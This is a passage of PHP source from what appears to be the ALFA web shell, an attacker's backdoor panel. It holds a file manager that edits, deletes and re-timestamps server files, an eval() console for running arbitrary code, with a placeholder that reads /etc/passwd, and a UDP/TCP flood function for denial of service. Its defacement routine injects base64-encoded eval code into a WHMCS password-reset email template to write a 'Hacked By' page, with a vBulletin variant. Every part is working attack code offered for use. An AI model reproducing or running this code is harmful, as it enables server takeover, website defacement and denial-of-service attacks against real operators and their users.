1961. }}}} unset($_SESSION['f']);
1962. break;
1963. default: if(!empty($_POST['alfa1'])){ $_SESSION['act'] = @$_POST['alfa1'];
1964. $_SESSION['f'] = @$_POST['f'];
1965. $_SESSION['c'] = @$_POST['c'];
1966. } break;
1967. } } $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
1968. if($dirContent === false){ echo '<center><br><span style="font-size:16px;
1969. "><span style="color: red;
1970. -webkit-text-shadow: 1px 1px 13px;
1971. "><strong><b><big>!!! Access Denied !!!</b></big><br><br></strong></div>
1972. ';
1973. alfaFooter();
1974. return;
1975. } global $sort;
1976. $sort = array('name', 1);
1977. if(!empty($_POST['alfa1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['alfa1'], $match)) $sort = array($match[1], (int)$match[2]);
1978. } echo "
1979. <script>
1980. function checkBox() {
1981. for(i=0;
1982. i<d.files.elements.length;
1983. i++)
1984. if(d.files.elements[i].type == 'checkbox')
1985. d.files.elements[i].checked = d.files.elements[0].checked;
1986.  
1987. }
1988. </script>
1989. <form onsubmit='fc(this);
1990. return false;
1991. ' name='files' method='post'><table width='100%' class='main' cellspacing='0' cellpadding='2'><tr><th width='13px'><div class='myCheckbox' style='padding-left:0px;
1992. '><input type='checkbox' id='mchk' onclick='checkBox();
1993. ' class='chkbx'><label for='mchk'></label></div></th><th><font color=\"#FFFFFF\"><b>Name</font></b></th><th><font color=\"#FFFFFF\"><b>Size<font></b></th><th><font color=\"#FFFFFF\"><b>Modify</b></font></th><th><font color=\"#FFFFFF\"><b>Owner/Group</font></b></th><th><font color=\"#FFFFFF\"><b>Permissions</font></b></th><th><font color=\"#FFFFFF\"><b>Actions</b></font></th></tr>";
1994. $dirs = $files = array();
1995. $n = count($dirContent);
1996. for($i=0;
1997. $i<$n;
1998. $i++) { $ow = function_exists("posix_getpwuid")?@posix_getpwuid(@fileowner($dirContent[$i])):array("name" => "????");
1999. $gr = function_exists("posix_getgrgid")?@posix_getgrgid(@filegroup($dirContent[$i])):array("name" => "????");
2000. $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => alfaPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) );
2001. if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file'));
2002. elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
2003. elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array('type' => 'dir'));
2004. } $GLOBALS['sort'] = $sort;
2005. function alfaCmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
2006. else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
2007. } usort($files, "alfaCmp");
2008. usort($dirs, "alfaCmp");
2009. $files = array_merge($dirs, $files);
2010. $l=0;
2011. $cc=0;
2012. $mb_strlen = function_exists("mb_strlen")?true:false;
2013. $mb_substr = function_exists("mb_substr")?true:false;
2014. foreach($files as $f){ $newname=$f['name'];
2015. if($mb_strlen&&$mb_substr){if(mb_strlen($f['name'], 'UTF-8')>60){$newname = mb_substr($f['name'], 0, 60, 'utf-8').'...';
2016. }else{$newname = $f['name'];
2017. }}else{if(strlen($f['name'])>60){$newname = substr($f['name'], 0, 60).'...';
2018. }else{$newname = $f['name'];
2019. }} $checkbox = 'checkbox'.$cc;
2020. $icon = $GLOBALS['Alfa_Show_Icons']?'<img src="'.findicon($f['name'],$f['type']).'" width="30" height="30">':'';
2021. $style = $GLOBALS['Alfa_Show_Icons']?'position:relative;
2022. display:inline-block;
2023. bottom:12px;
2024. ':'';
2025. echo '<tr'.($l?' class=l1':'').'><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="'.urlencode($f['name']).'" class="chkbx" id="'.$checkbox .'"><label for="'.$checkbox .'"></label></div></td><td>'.$icon.'<div style="'.$style.'"><a href=javascript:void(0) onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'auto\')">'.($GLOBALS['cwd'].$f['name']==$GLOBALS['__file_path']?"<font color=red>".$f['name']."</font>":htmlspecialchars($newname)):'g(\'FilesMan\',\''.$f['path'].'\');
2026. " title=' . $f['link'] . '><b>| ' . htmlspecialchars($f['name']) . ' |</b>').'</a></td></div><td>'.(($f['type']=='file')?alfaSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=javascript:void(0) onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'. $f['perms'].'</td><td><a class="actions" href="javascript:void(0);
2027. " onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a class="actions" href="javascript:void(0);
2028. " onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a class="actions" href="javascript:void(0);
2029. " onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a class="actions" href="javascript:void(0);
2030. " onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'<a class="actions" href="javascript:void(0);
2031. " onclick="var chk = confirm(\'Are You Sure For Delete # '.urldecode($f['name']).' # ?\');
2032. chk ? g(\'FilesMan\',null,\'delete\', \''.urlencode($f['name']).'\') : \'\';
2033. "> X </a></td></tr>';
2034. $l = $l?0:1;
2035. $cc++;
2036. } echo "<tr><td colspan=7>
2037. <input type=hidden name=a value='FilesMan'>
2038. <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
2039. <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
2040. <select id='tools_selector' name='alfa1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete' selected>Delete</option><option value='zip'>Add 2 Compress (zip)</option><option value='unzip'>Add 2 Uncompress (zip)</option><option value='paste'>Paste / Zip / Unzip </option></select>
2041. <input type='submit' value=' '>
2042. </form></table></div></div>";
2043. alfafooter();
2044. } function alfaFilesTools(){ alfahead();
2045. echo '<div class="header">';
2046. if(isset($_POST['alfa1']))$_POST['alfa1'] = urldecode($_POST['alfa1']);
2047. if($_POST['alfa2'] == 'auto'){if(is_array(@getimagesize($_POST['alfa1']))){$_POST['alfa2'] = 'image';
2048. }else{$_POST['alfa2'] = 'view';
2049. }} if(@$_POST['alfa2'] == 'mkfile'){ $_POST['alfa1'] = trim($_POST['alfa1']);
2050. if(!file_exists($_POST['alfa1'])){ $fp = @fopen($_POST['alfa1'], 'w');
2051. if($fp){ $_POST['alfa2'] = "edit";
2052. fclose($fp);
2053. } }else{ $_POST['alfa2'] = "edit";
2054. } } if(!file_exists(@$_POST['alfa1'])){ echo __pre()."<center><p><div class=\"txtfont\"><font color='red'>FILE DOEST NOT EXITS...!</font></div></p></center></div>";
2055. alfaFooter();
2056. return;
2057. } $uid = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($_POST['alfa1'])):'';
2058. if(!$uid) { $uid['name'] = function_exists("fileowner")?@fileowner($_POST['alfa1']):'';
2059. $gid['name'] = function_exists("filegroup")?@filegroup($_POST['alfa1']):'';
2060. } else $gid = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($_POST['alfa1'])):'';
2061. echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['alfa1'])).' <span>Size:</span> '.(is_file($_POST['alfa1'])?alfaSize(filesize($_POST['alfa1'])):'-').' <span>Permission:</span> '.alfaPermsColor($_POST['alfa1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
2062. echo '<br>';
2063. if(empty($_POST['alfa2']))$_POST['alfa2'] = 'view';
2064. if(is_file($_POST['alfa1'])){ $m = array('View', 'Edit', 'Download', 'Highlight', 'Chmod', 'Rename', 'Touch', 'Delete', 'Image', 'Hexdump');
2065. }else{ $m = array('Chmod', 'Rename', 'Touch');
2066. } foreach($m as $v) echo $v == 'Delete' ? '<a href="javascript:void(0);
2067. " onclick="var chk=confirm(\'Are You Sure For Delete This File ?\');
2068. chk?g(\'FilesTools\',null,\''.$_POST['alfa1'].'\',\''.strtolower($v).'\'):\'\';
2069. "><span>'.((strtolower($v)==@$_POST['alfa2'])?'<b><span> '.$v.' </span> </b>':$v).' | </span></a> ' : '<a href="javascript:void(0);
2070. " onclick="g(\'FilesTools\',null,\''.$_POST['alfa1'].'\',\''.strtolower($v).'\')"><span>'.((strtolower($v)==@$_POST['alfa2'])?'<b><span> '.$v.' </span> </b>':$v).' | </span></a> ';
2071. echo '<br><br>';
2072. switch($_POST['alfa2']){ case 'view': echo '<pre class="ml1">';
2073. echo htmlspecialchars(__read_file($_POST['alfa1']));
2074. echo '</pre>';
2075. break;
2076. case 'highlight': if(@is_readable($_POST['alfa1'])){ echo '<div class="ml1" style="background-color: #e1e1e1;
2077. color:black;
2078. ">';
2079. $code = @highlight_file($_POST['alfa1'],true);
2080. echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
2081. } break;
2082. case 'delete': if(@is_writable($_POST['alfa1'])){ if(@unlink($_POST['alfa1']))echo 'File Deleted...';
2083. else echo 'Error...';
2084. } break;
2085. case 'chmod': if(!empty($_POST['alfa3'])){ $perms = 0;
2086. for($i=strlen($_POST['alfa3'])-1;
2087. $i>=0;
2088. --$i) $perms += (int)$_POST['alfa3'][$i]*pow(8, (strlen($_POST['alfa3'])-$i-1));
2089. if(!@chmod($_POST['alfa1'], $perms)){ echo '<font color="#FFFFFF"><b>Can\'t set permissions!</b></font><br><script>document.mf.alfa3.value="";
2090. </script>';
2091. }else{echo('Success!');
2092. } } clearstatcache();
2093. AlfaNum(8,9,10,7,6,5,4,2,1);
2094. echo '<script>alfa3_="";
2095. </script><form onsubmit="g(\'FilesTools\',null,\''.$_POST['alfa1'].'\',\''.$_POST['alfa2'].'\',this.chmod.value);
2096. return false;
2097. "><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['alfa1'])),-4).'"><input type=submit value=">>"></form>';
2098. break;
2099. case 'edit': if( !is_writable($_POST['alfa1'])) { echo 'File isn\'t writeable';
2100. break;
2101. } if(!empty($_POST['alfa3'])){ $time = @filemtime($_POST['alfa1']);
2102. $_POST['alfa3'] = substr($_POST['alfa3'],1);
2103. $fp = @__write_file($_POST['alfa1'],$_POST['alfa3']);
2104. if($fp){ echo 'Saved!<br><script>alfa3_="";
2105. </script>';
2106. @touch($_POST['alfa1'],$time,$time);
2107. } } echo '<form onsubmit="g(\'FilesTools\',null,\''.$_POST['alfa1'].'\',\''.$_POST['alfa2'].'\',\'1\'+this.text.value);
2108. return false;
2109. "><p><input type="submit" value=" "></p><textarea name=text class=bigarea>';
2110. echo htmlspecialchars(__read_file($_POST['alfa1']));
2111. echo '</textarea><p><input type="submit" value=" "></p></form>';
2112. break;
2113. case 'hexdump': $c = @file_get_contents($_POST['alfa1']);
2114. $n = 0;
2115. $h = array('00000000<br>','','');
2116. $len = strlen($c);
2117. for ($i=0;
2118. $i<$len;
2119. ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' ';
2120. switch ( ord($c[$i]) ) { case 0: $h[2] .= ' ';
2121. break;
2122. case 9: $h[2] .= ' ';
2123. break;
2124. case 10: $h[2] .= ' ';
2125. break;
2126. case 13: $h[2] .= ' ';
2127. break;
2128. default: $h[2] .= $c[$i];
2129. break;
2130. } $n++;
2131. if ($n == 32) { $n = 0;
2132. if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';
2133. } $h[1] .= '<br>';
2134. $h[2] .= "\n";
2135. } } echo '<table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;
2136. "><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
2137. break;
2138. case 'rename': if( !empty($_POST['alfa3']) ) { if(!@rename($_POST['alfa1'], $_POST['alfa3'])){ echo 'Can\'t rename!<br>';
2139. }else{echo('Renamed!');
2140. } } echo '<form onsubmit="g(\'FilesTools\',null,\''.$_POST['alfa1'].'\',\''.$_POST['alfa2'].'\',this.name.value);
2141. return false;
2142. "><input type="text" name="name" value="'.htmlspecialchars(isset($_POST['alfa3'])&&$_POST['alfa3']!=''?$_POST['alfa3']:$_POST['alfa1']).'"><input type=submit value=">>"></form>';
2143. break;
2144. case 'touch': if( !empty($_POST['alfa3']) ) { $time = strtotime($_POST['alfa3']);
2145. if($time) { if(!touch($_POST['alfa1'],$time,$time)) echo 'Fail!';
2146. else echo 'Touched!';
2147. } else echo 'Bad time format!';
2148. } clearstatcache();
2149. echo '<script>alfa3_="";
2150. </script><form onsubmit="g(\'FilesTools\',null,\''.$_POST['alfa1'].'\',\''.$_POST['alfa2'].'\',this.touch.value);
2151. return false;
2152. "><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['alfa1'])).'"><input type=submit value=">>"></form>';
2153. break;
2154. case 'image': echo('<hr>');
2155. $file = $_POST['alfa1'];
2156. $image_info = @getimagesize($file);
2157. if(is_array($image_info)){ $width = (int)$image_info[0];
2158. $height = (int)$image_info[1];
2159. $image_info_h = "Image type = <span>[</span> ".$image_info['mime']." <span>]</span><br>Image Size = <span>[ </span>".$width." x ".$height."<span> ]</span><br>";
2160. if($width > 800){$width = 800;
2161. } echo $content = "<center>".$image_info_h."<br><img id='viewImage' style='width:".$width."px;
2162. border:1px solid green;
2163. ' src='data:".$image_info['mime'].";
2164. base64,".__ZW5jb2Rlcg(__read_file($file))."' alt='".$file."'></center><br>";
2165. } break;
2166. } echo '</div>';
2167. alfaFooter();
2168. } function findicon($file,$type){ $s = 'http://solevisible.com/icons/';
2169. $types = array('json','ppt','pptx','xls','xlsx','msi','config','cgi','pm','c','cpp','cs','java','aspx','asp','db','ttf','eot','woff','woff2','woff','conf','log','apk','cab','bz2','tgz','dmg','izo','jar','7z','iso','rar','bat','sh','alfa','gz','tar','php','php4','php5','html','xhtml','shtml','htm','zip','png','jpg','jpeg','gif','bmp','ico','txt','js','rb','py','xml','css','sql','htaccess','pl','ini','dll','exe','mp3','mp4','m4a','mov','flv','swf','mkv','avi','wmv','mpg','mpeg','dat','pdf','3gp','doc','docx','docm');
2170. if($type!='file'){ return ($file=='..'?$s.'back.png':$s.'folder.png');
2171. }else{ $ext = explode('.',$file);
2172. $ext = end($ext);
2173. $ext = strtolower($ext);
2174. return (in_array($ext,$types)?$s.$ext.'.png':$s.'notfound.png');
2175. } } function alfadlfile(){ if(isset($_POST['c'],$_POST['file'])){ $_POST['file'] = urldecode(utf8_decode($_POST['file']));
2176. $_POST['file'] = $_POST['c'].'/'.$_POST['file'];
2177. if(@is_file($_POST['file']) && @is_readable($_POST['file'])){ ob_start("ob_gzhandler", 4096);
2178. header("Content-Disposition: attachment;
2179. filename=".basename($_POST['file']));
2180. if(function_exists("mime_content_type")){ $type = @mime_content_type($_POST['file']);
2181. header("Content-Type: " . $type);
2182. }else{header("Content-Type: application/octet-stream");
2183. } echo __read_file($_POST['file']);
2184. }else echo('Error...!');
2185. }} function alfaphpeval(){ alfahead();
2186. if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'ini')){ echo '<div class=header>';
2187. ob_start();
2188. $INI=ini_get_all();
2189. print '<table border=0><tr>' .'<td class="listing"><font class="highlight_txt">Param</td>' .'<td class="listing"><font class="highlight_txt">Global value</td>' .'<td class="listing"><font class="highlight_txt">Local Value</td>' .'<td class="listing"><font class="highlight_txt">Access</td></tr>';
2190. foreach ($INI as $param => $values) print "\n".'<tr>' .'<td class="listing"><b>'.$param.'</td>' .'<td class="listing">'.$values['global_value'].' </td>' .'<td class="listing">'.$values['local_value'].' </td>' .'<td class="listing">'.$values['access'].' </td></tr>';
2191. $tmp = ob_get_clean();
2192. $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
2193. $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
2194. echo str_replace('<h1','<h2', $tmp) .'</div><br>';
2195. } if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'info')) { echo '<div class=header><style>.p {color:#000;
2196. }</style>';
2197. ob_start();
2198. phpinfo();
2199. $tmp = ob_get_clean();
2200. $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
2201. $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
2202. echo str_replace('<h1','<h2', $tmp) .'</div><br>';
2203. } if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'exten')) { echo '<div class=header>';
2204. ob_start();
2205. $EXT=get_loaded_extensions();
2206. print '<table border=0><tr><td class="listing">' .implode('</td></tr>'."\n".'<tr><td class="listing">', $EXT) .'</td></tr></table>' .count($EXT).' extensions loaded';
2207. echo '</div><br>';
2208. } if(empty($_POST['ajax']) && !empty($_POST['alfa1'])) $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
2209. echo '<div class=header><Center><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'ini\')">| INI_INFO | </a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'info\')"> | phpinfo |</a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'exten\')"> | extensions |</a></center><br><form name=pf method=post onsubmit="g(\'phpeval\',null,this.code.value,\'\');
2210. return false;
2211. "><textarea placeholder="file_get_contents(\'/etc/passwd\');
2212. " name=code class=bigarea id=PhpCode>'.(!empty($_POST['alfa1'])?htmlspecialchars($_POST['alfa1']):'').'</textarea><center><input type="submit" value="" style="margin-top:5px"></center>';
2213. echo '</form><pre id=PhpOutput style="'.(empty($_POST['alfa1'])?'display:none;
2214. ':'').'margin-top:5px;
2215. " class=ml1>';
2216. if(!empty($_POST['alfa1'])) { ob_start();
2217. eval($_POST['alfa1']);
2218. echo '<textarea class=bigarea id=PhpCode>'.htmlspecialchars(ob_get_clean()).'</textarea>';
2219. } echo '</pre></div>';
2220. alfafooter();
2221. } function alfahash(){ if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));
2222. }} if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';
2223. for($i=0;
2224. $i<strlen($p);
2225. ++$i)$r.= '%'.dechex(ord($p[$i]));
2226. return strtoupper($r);
2227. }} $stringTools = array( 'Base64_encode ( $string )' => '__ZW5jb2Rlcg($s)', 'Base64_decode ( $string )' => '__ZGVjb2Rlcg($s)', 'strrev ( $string )' => 'strrev($s)', 'bin2hex ( $string )' => 'bin2hex($s)', 'hex2bin ( $string )' => 'hex2bin($s)', 'md5 ( $string )' => 'md5($s)', 'sha1 ( $string )' => 'sha1($s)', 'hash ( "sha251", $string ) --> sha251' => 'hash("sha256",$s)', 'hash ( "sha384", $string ) --> sha384' => 'hash("sha384",$s)', 'hash ( "sha512", $string ) --> sha512' => 'hash("sha512",$s)', 'crypt ( $string )' => 'crypt($s)', 'crc32 ( $string )' => 'crc32($s)', 'str_rot13 ( $string )' => 'str_rot13($s)', 'urlencode ( $string )' => 'urlencode($s)', 'urldecode ( $string )' => 'urldecode($s)', 'full_urlencode ( $string )' => 'full_urlencode($s)', 'htmlspecialchars ( $string )' => 'htmlspecialchars($s)', 'base64_encode (gzdeflate( $string , 9)) --> Encode' => '__ZW5jb2Rlcg(gzdeflate($s, 9))', 'gzinflate (base64_decode( $string )) --> Decode' => '@gzinflate(__ZGVjb2Rlcg($s))', 'str_rot13 (base64_encode( $string )) --> Encode' => 'str_rot13(__ZW5jb2Rlcg($s))', 'base64_decode (str_rot13( $string )) --> Decode' => '__ZGVjb2Rlcg(str_rot13($s))', 'str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode' => 'str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))', 'gzinflate (base64_decode(str_rot13( $string ))) --> Decode' => '@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))', );
2228. alfahead();
2229. echo '<div class=header>';
2230. echo "<form onSubmit='g(\"hash\",null,this.selectTool.value,this.input.value);
2231. return false;
2232. '><div class='txtfont'>Method:</div> <select name='selectTool' style='width:400px;
2233. '>";
2234. foreach($stringTools as $k => $v) echo "<option value='".htmlspecialchars($v)."' ".($_POST['alfa1']==$v?'selected':'').">".$k."</option>";
2235. echo "</select> <input type='submit' value=' '/><br><textarea name='input' style='margin-top:5px' class='bigarea'>".(empty($_POST['alfa1'])?'':htmlspecialchars(@$_POST['alfa2']))."</textarea></form>";
2236. if(!empty($_POST['alfa1'])){ $string = addslashes($_POST['alfa2']);
2237. $string = str_replace('\"','"',$string);
2238. $alg = $_POST['alfa1'];
2239. $code = str_replace('$s',"'".$string."'",$alg);
2240. ob_start();
2241. eval('echo '.$code.';
2242. ');
2243. $res = ob_get_contents();
2244. ob_end_clean();
2245. if(in_array($alg, $stringTools))echo '<textarea class="bigarea" id="PhpCode">'.htmlspecialchars($res).'</textarea>';
2246. } echo "</div>";
2247. alfaFooter();
2248. } function alfados(){ alfahead();
2249. echo '<div class=header>';
2250. echo '<center><p><div class="txtfont_header">| DOS |</div></p><form onSubmit="g(\'dos\',null,this.host.value,this.time.value,this.port.value,this.m.value);
2251. return false;
2252. "><div class="txtfont">Method : <select name="m" style="width:80px;
2253. "><option value="udp">UDP</option><option value="tcp">TCP</option></select> Host : <input name="host" type="text" value="localhost" size="25" /> Time : <input name="time" type="text" size="15" /> Port : <input name="port" type="text" size="10" /> <input type="submit" value=" " /></div></form></center><br>';
2254. if(!empty($_POST['alfa1']) && !empty($_POST['alfa2']) && !empty($_POST['alfa3'])){ echo __pre();
2255. $packets=0;
2256. ignore_user_abort(true);
2257. $exec_time=(int)$_POST['alfa2'];
2258. $time=time();
2259. $max_time=$exec_time+$time;
2260. $host=$_POST['alfa1'];
2261. $port=(int)$_POST['alfa3'];
2262. $method=$_POST['alfa4'];
2263. $out = str_repeat('X',65000);
2264. while(1){ $packets++;
2265. if(time() > $max_time){ break;
2266. } $fp = @fsockopen($method.'://'.$host, $port, $errno, $errstr, 5);
2267. if($fp){ fwrite($fp, $out);
2268. fclose($fp);
2269. } } echo "<center>$packets (" . @round(($packets*65)/1024, 2) . " MB) packets averaging ". @round($packets/$exec_time, 2) . " packets per second</center>";
2270. echo "</pre>";
2271. } echo '</div>';
2272. alfafooter();
2273. } function __pre(){return('<pre id="strOutput" style="margin-top:5px" class="ml1">');
2274. } function alfaIndexChanger(){ alfahead();
2275. ALfaNum(5,6,7,8,9,10);
2276. echo '<div class=header><center><p><div class="txtfont_header">| Index Changer |</div></p><h3><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,null,\'whmcs\')">| Whmcs | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,\'vb\',null)">| vBulletin | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,\'mybb\')">| MyBB | </a></h3></center>';
2277. if(isset($_POST['alfa3'])&&($_POST['alfa3'] == 'whmcs')){ echo __pre();
2278. ALfaNum(1,2,3,4,5);
2279. echo "<center><center><div class='txtfont_header'>| Whmcs |</div>
2280. <p><center>".getConfigHtml('whmcs')."<form onSubmit=\"g('IndexChanger',null,null,null,'whmcs',this.fname.value,this.path.value,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value);
2281. return false;
2282. \">
2283. ";
2284. $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'URL', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'File Name', 'inputName' => 'fname', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50') );
2285. create_table($table);
2286. echo "<br><div class='txtfont'>| Your Index |</div><br>
2287. <textarea name=index rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
2288. <input type='submit' value=' '>
2289. </form></center></center>";
2290. if(isset($_POST['alfa6'])){ $s0levisible="Powered By Solevisible";
2291. $dbu = $_POST['alfa6'];
2292. $path = $_POST['alfa5'];
2293. $fname = $_POST['alfa4'];
2294. $dbn = $_POST['alfa7'];
2295. $dbp = $_POST['alfa8'];
2296. $dbh = $_POST['alfa9'];
2297. $index = $_POST['alfa10'];
2298. $index = str_replace("\'","'",$index);
2299. $deface = '$x = base64_decode("'.__ZW5jb2Rlcg($index).'");
2300. $solevisible = fopen("'.$fname.'","w");
2301. fwrite($solevisible,$x);
2302. ';
2303. $saveData = __ZW5jb2Rlcg($deface);
2304. $Def = '{php}eval(base64_decode("'.$saveData.'"));
2305. {/php}';
2306. if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){ $conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
2307. $soleSave=@mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
2308. $soleGet = mysqli_fetch_assoc($soleSave);
2309. $tempSave1 = $soleGet['message'];
2310. $tempSave = str_replace("'","\'",$tempSave1);
2311. $inject = "UPDATE tblemailtemplates SET message='$Def' WHERE name='Password Reset Validation'";
2312. $result=@mysqli_query($conn,$inject) or die (mysqli_error($conn));
2313. $create = "insert into tblclients (email) values('solevisible@fbi.gov')";
2314. $result2 =@mysqli_query($conn,$create) or die (mysqli_error($conn));
2315. if(function_exists('curl_version')){ $AlfaSole = new AlfaCURL(true);
2316. $saveurl = $AlfaSole->Send($path."/pwreset.php");
2317. $getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
2318. $AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
2319. $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
2320. $Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
2321. __alert('File Created...');
2322. echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$path."/".$fname."'>Click Here !</a></font></b></center><br><br>";
2323. }else{ echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target </font><font color=red>\" ".$path."/pwreset.php \"</font><br/><font color=\"#FFFFFF\"> and reset password with email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color=\"#FFFFFF\">and go to</font> <font color=red>\" ".$path."/".$fname." \"</font></b></center><br><br>";
2324. }}}} if(isset($_POST['alfa1']) && ($_POST['alfa1'] == 'vb')){ echo __pre();
2325. ALfaNum(1,2,3,4,5);
2326. echo "<center><center><div class='txtfont_header'>| vBulletin |</div>
2327. <p><center>".getConfigHtml('vb')."<form onSubmit=\"g('IndexChanger',null,'vb',this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value,this.prefix.value,'>>');
2328. return false;
2329. \">
2330. ";
2331. $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Prefix', 'inputName' => 'prefix', 'id' => 'db_prefix', 'inputValue' => '', 'inputSize' => '50') );
2332. create_table($table);
2333. echo "<br><div class='txtfont'>| Your Index |</div><br>
2334. <textarea name='index' rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
2335. <input type='submit' value=' '></form></center></center>";
2336. if($_POST['alfa8']=='>>'){ $s0levisible="Powered By Solevisible";
2337. $dbu = $_POST['alfa2'];
2338. $dbn = $_POST['alfa3'];
2339. $dbp = $_POST['alfa4'];
2340. $dbh = $_POST['alfa5'];
2341. $index = $_POST['alfa6'];
2342. $prefix = $_POST['alfa7'];
